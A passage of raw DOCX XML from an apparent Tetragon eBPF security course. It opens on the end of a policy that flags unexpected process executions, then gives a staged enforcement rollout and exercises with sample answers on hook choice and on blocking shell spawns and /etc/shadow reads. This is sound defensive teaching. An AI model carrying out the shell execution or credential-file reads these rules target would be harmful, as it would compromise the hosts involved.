        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  - call: "sys_execve"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    syscall: true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    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type: "string"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    selectors:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    - matchArgs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      - index: 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        operator: "NotEqual"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        values: ["/app/payment-service"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      matchActions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      - action: "Post"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CONVERSION TO ENFORCEMENT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy the policy in this observability-only form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Collect events for at least a week in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Review every event. Are there LEGITIMATE execs happening besides /app/payment-service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For each legitimate one, add it to the allowed list or add an exception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continue until NO unexpected events appear for multiple days.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Switch matchActions from Post to Signal + argSig: 9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy to a CANARY node first; monitor carefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Roll out gradually to other nodes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document: the policy, its purpose, the kill-switch command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.3 Exercise 3 — Comparing Hooks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For each scenario, what's the best HOOK TYPE to use in a Tetragon policy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You want to detect all process executions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You want to enforce that certain files cannot be read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You want to observe specific application functions (e.g., SSL_write).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You want to work on kernel 4.19 (old kernel).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TRACEPOINT. sched/sched_process_exec is stable. Works across kernel versions. Good choice for pure observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BPF LSM. security_file_open hook is the standard for file access enforcement. Can return EPERM to prevent the open.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UPROBE on the application binary. Hook into SSL_write symbol address. Allows observation of userspace function calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">KPROBE or TRACEPOINT for observability. BPF LSM unavailable; enforcement via kprobe override on LSM functions (like security_file_open) if they exist as kprobe-able targets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.4 Exercise 4 — Rollout Planning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your company wants to deploy Tetragon for enforcement of a specific rule: "block unauthorized shell execution in the production namespace." Walk through your rollout plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Answer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WEEK 1-2: UNDERSTANDING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy Tetragon in observability mode (no policies with enforcement) cluster-wide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write the shell-detection policy with action: Post.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply to production namespace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor events. Who's running shells? Engineers doing kubectl exec? CI jobs? Unexpected processes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WEEK 3-4: EXCEPTION BUILDING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For each legitimate shell invocation, document the reason.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If legit, build an exception (specific users, specific pods, specific times).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Refine the policy to exclude documented legitimate cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aim for zero unexplained shell events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WEEK 5: CANARY ENFORCEMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Convert the policy to action: Signal in ONE production namespace (not the most critical one).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor intensively for 72 hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any false positives (legit shell killed)? Roll back immediately; investigate; improve exception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WEEK 6: WIDER ROLLOUT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If canary went well, extend to more production namespaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Still in enforcement mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continue monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WEEK 7+: OPERATIONAL STATE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All production covered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kill-switch tested: practice kubectl delete tracingpolicy under "emergency" conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On-call team trained on Tetragon alerts and response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monthly review of policy matches — any new legitimate patterns to add?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ONGOING: Monitor for policy drift. New workloads might legitimately need shells; add exceptions. Stale exceptions (no longer needed) should be removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.5 Exercise 5 — Override vs. Signal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For each scenario, argue for Override (deny syscall) or Signal SIGKILL (kill process):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A compromised process tries to read /etc/shadow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A process tries to spawn an unauthorized shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A process is exhibiting ransomware-like file-encryption patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A process tries to load an unauthorized kernel module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OVERRIDE. Preventing the READ ITSELF is the goal. Override returns EPERM; /etc/shadow's contents never reach userspace. The process probably continues doing legitimate work. Signal would kill the process but the data briefly entered its memory; Override is cleaner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIGNAL. The shell itself is the threat — not the syscall that launched it. The shell, if it runs, can do harm. Kill the whole thing. Override on execve prevents the shell from starting, which is equivalent, but Signal is simpler semantically — "this process is compromised, terminate it."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIGNAL. Ransomware is actively malicious. Override'ing one file operation doesn't help; it'll try another. Kill the process entirely. The container restarts cleanly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OVERRIDE. The process might be legitimate (misbehaving or tricked). Denying the module load is sufficient. Signal would kill the process unnecessarily. Override returns EPERM; the process can continue or fail gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.6 Exercise 6 — The Cilium Relationship</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your organization runs Cilium as CNI. Security team is proposing Tetragon adoption. Platform team has concerns about integration complexity. Address these concerns:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Will Tetragon conflict with Cilium's eBPF programs?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Does Tetragon depend on Cilium?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Can we use Cilium identities in Tetragon policies?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Will they share the same agent / pod?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"What if we want to replace Cilium but keep Tetragon?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NO CONFLICT. Cilium and Tetragon attach eBPF programs to different hooks. They coexist. Running both works reliably; the Isovalent team explicitly supports this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NO. Tetragon is independent. Works with Cilium, Flannel, Calico, or any CNI. The project happens to be maintained by the same organization but has its own codebase, DaemonSet, and deployment model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SOMEWHAT. Cilium assigns numeric identities to pods based on labels. Tetragon can reference pod labels directly. Full identity integration is more natural in Isovalent's enterprise offering; open-source Tetragon uses pod metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NO. They run as separate DaemonSets with separate pods. Different codebases; different responsibilities. Each can be upgraded/troubleshot independently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FULLY SUPPORTED. Tetragon doesn't depend on Cilium. You could swap Cilium for a different CNI (Flannel, Calico, AWS VPC CNI) and Tetragon would continue working unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.7 Exercise 7 — Kernel Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your organization runs a mix of kernels:</w:t>
      </w:r>
    </w:p>
    <w:p>
